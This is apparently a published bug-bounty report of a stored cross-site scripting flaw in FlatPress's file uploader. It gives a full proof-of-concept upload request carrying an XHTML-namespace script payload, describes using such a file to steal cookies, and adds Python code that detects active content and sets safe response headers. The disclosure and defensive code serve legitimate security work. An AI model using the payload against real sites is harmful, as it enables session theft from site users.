Stored XSS via XML File in flatpressblog/flatpress

Valid

Reported on

Dec 24th 2022


Description

When a user uploads a file with the .xml extension and then accesses it directly, the server responds with Content-Type: image/svg+xml, which causes the browser to process the XML as an HTML document, so script embedded in it executes.

POC

POST /flatpress-master/admin.php?p=uploader&action=default HTTP/1.1
Host: localhost
Content-Length: 639
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMXzGcbIqZ5KtoAKf
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: fpuser_fp-a37b0eea=admin; fppass_fp-a37b0eea=%242y%2410%2463YIyEccoLYf6kU0s.2lb.D1GcJ7GsnvoWR.aiWBX5alwZmXZpiMK; PHPSESSID=69js8mspjvh35iaud5vsb2sdfq; security_level=0; fpsess_fp-a37b0eea=81ft5fe9s1evbo5kaovh623v8u

------WebKitFormBoundaryMXzGcbIqZ5KtoAKf
Content-Disposition: form-data; name="_wpnonce"

78d8e366e5
------WebKitFormBoundaryMXzGcbIqZ5KtoAKf
Content-Disposition: form-data; name="_wp_http_referer"

/flatpress-master/admin.php?p=uploader
------WebKitFormBoundaryMXzGcbIqZ5KtoAKf
Content-Disposition: form-data; name="upload[]"; filename="xss.xml"
Content-Type: image/svg+xml

<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(document.domain)</something:script>
------WebKitFormBoundaryMXzGcbIqZ5KtoAKf
Content-Disposition: form-data; name="upload"

Upload
------WebKitFormBoundaryMXzGcbIqZ5KtoAKf--

Steps to take

  1. Log in and then access /admin.php?p=uploader&action=default
  2. Upload an XML file containing malicious JavaScript that steals user cookies.
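The description and the steps above come down to one server-side decision: an uploaded XML-family file is handed back to the browser with a renderable content type, and the browser honours the XHTML namespace on the `something:script` element regardless of its prefix. The following is an added example, not FlatPress code and not the fix referenced in commit 3cc223. It parses an upload, flags script elements in any namespace plus event-handler attributes and javascript: URLs, and chooses response headers so that a flagged file is never served inline and even an unflagged one is served with a CSP that forbids script. The function names `contains_active_content` and `serve_headers`, the `MARKUP_EXTS` set and the `BENIGN_SVG` sample are assumptions made for this example; `REPORT_PAYLOAD` is the payload from the PoC request.

```python
"""
Added example (not FlatPress code): detect active content in an uploaded
XML/SVG file and pick response headers so a browser cannot run script
from it in the site's origin. Names and the benign sample are assumed;
REPORT_PAYLOAD is the payload from the report's PoC request.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, Optional, Tuple

XLINK_NS = "http://www.w3.org/1999/xlink"

# Extensions a browser renders as markup when served inline (assumed set).
MARKUP_EXTS = {"xml", "svg", "xhtml", "html", "htm"}

# Payload from the report's PoC; the SVG below is a constructed benign sample.
REPORT_PAYLOAD = (b'<something:script xmlns:something="http://www.w3.org/1999/xhtml">'
                  b"alert(document.domain)</something:script>")
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="4"/></svg>'


def _split(qname: str) -> Tuple[Optional[str], str]:
    """ElementTree writes namespaced names as '{uri}local'; split them."""
    if qname.startswith("{"):
        uri, local = qname[1:].split("}", 1)
        return uri, local
    return None, qname


def contains_active_content(data: bytes) -> Tuple[bool, str]:
    """Return (True, reason) if rendering this XML would execute script.

    Every element is checked by local name, not prefix: the browser acts on
    the namespace URI, which is exactly why 'something:script' in the
    XHTML namespace works in the report. ElementTree does not resolve
    external entities, so parsing untrusted input here is safe.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # Not well-formed: treat as suspicious rather than silently allowing it.
        return True, f"not well-formed XML ({exc})"
    for el in root.iter():
        ns, local = _split(el.tag)
        if local.lower() == "script":
            return True, f"<script> element in namespace {ns!r}"
        for attr, value in el.attrib.items():
            ans, aname = _split(attr)
            if aname.lower().startswith("on"):
                return True, f"event handler {aname!r} on <{local}>"
            # Browsers ignore whitespace inside the scheme, so strip it first.
            if aname.lower() == "href" and ans in (None, XLINK_NS):
                if re.sub(r"\s", "", value).lower().startswith("javascript:"):
                    return True, f"javascript: URL in href on <{local}>"
    return False, "no script elements, event handlers or javascript: URLs"


def serve_headers(filename: str, data: bytes) -> Tuple[Dict[str, str], str]:
    """Headers for serving an uploaded file back to a browser, plus a reason.

    Every response gets nosniff and a CSP that blocks inline and remote
    script and sandboxes the document into an opaque origin, so a vector
    the filter misses still cannot read the site's cookies or DOM. Markup
    uploads with active content are forced to download as an inert type.
    Non-markup uploads are out of scope here and are also forced to download.
    """
    base = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", base) or "download"
    ext = safe_name.rsplit(".", 1)[-1].lower() if "." in safe_name else ""
    headers = {
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }
    if ext in MARKUP_EXTS:
        active, why = contains_active_content(data)
        if not active:
            headers["Content-Type"] = "image/svg+xml" if ext == "svg" else "text/xml"
            headers["Content-Disposition"] = f'inline; filename="{safe_name}"'
            return headers, why
    else:
        why = f"extension {ext!r} is not served inline"
    headers["Content-Type"] = "application/octet-stream"
    headers["Content-Disposition"] = f'attachment; filename="{safe_name}"'
    return headers, why


if __name__ == "__main__":
    for name, blob in (("xss.xml", REPORT_PAYLOAD), ("logo.svg", BENIGN_SVG)):
        hdrs, reason = serve_headers(name, blob)
        print(name, "->", hdrs["Content-Type"], "|", reason)
```

Running it shows `xss.xml` going out as `application/octet-stream` with an attachment disposition because of the XHTML-namespace script element, while the benign SVG is served inline but still under `default-src 'none'; sandbox`. The filter covers the known vectors; the headers are the control that holds even when the filter does not.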

Impact

This vulnerability allows arbitrary JavaScript execution, which can be used to steal users' cookies, perform HTTP requests, read the content of same-origin pages, etc.

We are processing your report and will contact the flatpressblog/flatpress team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
We have contacted a member of the flatpressblog/flatpress team and are waiting to hear back a year ago
flatpressblog/flatpress maintainer validated this vulnerability a year ago

Learned that Markdown may contain JS as well - thanks!

juylang has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
flatpressblog/flatpress maintainer marked this as fixed in 1.3 with commit 3cc223 a year ago
The fix bounty has been dropped
Juy Lang (Researcher), a year ago:

Can you help me, designate the vulnerability as a CVE !!

This vulnerability has now been published a year ago